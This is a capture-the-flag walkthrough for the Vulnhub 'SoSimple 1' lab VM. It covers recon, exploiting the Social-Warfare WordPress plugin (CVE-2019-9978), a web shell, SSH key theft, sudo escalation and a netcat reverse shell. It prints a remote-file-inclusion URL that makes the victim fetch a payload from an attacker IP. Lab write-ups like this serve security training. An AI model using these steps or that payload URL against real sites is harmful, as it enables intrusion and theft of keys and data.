SoSimple 1 CTF — Vulnhub walkthrough
In this guide I’ll show you how to get the 3 flags for this VM.
You can download the VM here: https://www.vulnhub.com/entry/so-simple-1,515/ load the .ova to VirtualBox and once it boots it greets us with the IP:
Running NMAP on it will reveal port 80 and 22:
We don’t have much info for SSH so I’ll go after 80 first:
To speed things up I fire up openVAS (It might seem as overkill but I had it open when I started working on this VM) and scan the site, this gives me that there is a wordpress instance set up in a folder:
We run wpscan to get a first pass:
The Social-Warfare plugin is outdated:
And exploit-db has an exploit for that version (https://www.exploit-db.com/exploits/46794 | https://github.com/hash3liZer/CVE-2019-9978)
If you read through the script (I like seeing how things are done…) you’ll notice it is crafting a url like this:
http://192.168.0.151/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.0.102:8000/payload.txt
where .151 is the victims url and .102 is the attackers IP, so I set up a local webserver and used the payload from the example to see all users:
Running ls will reveal that we’re inside /wordpress/wp-admin, so I’ll have it download p0wny-shell to that folder.
Once that is up, we can look around the server:
the wordpress base folder contains secretkey.txt:
Digging through the “max” user’s folder:
If we go into the .ssh folder we can extract his RSA key and use it to authenticate via SSH:
LinEnum didn’t reveal much so we check sudo permissions with sudo -l and max can run service as steven, so we use that to launch bash:
Following the same pattern, we see that steven can run a .sh as root:
We setup a netcat listener and run a python reverse shell:
we have now managed to get to root:
And the final flag for this challenge!
Thank you for reading!
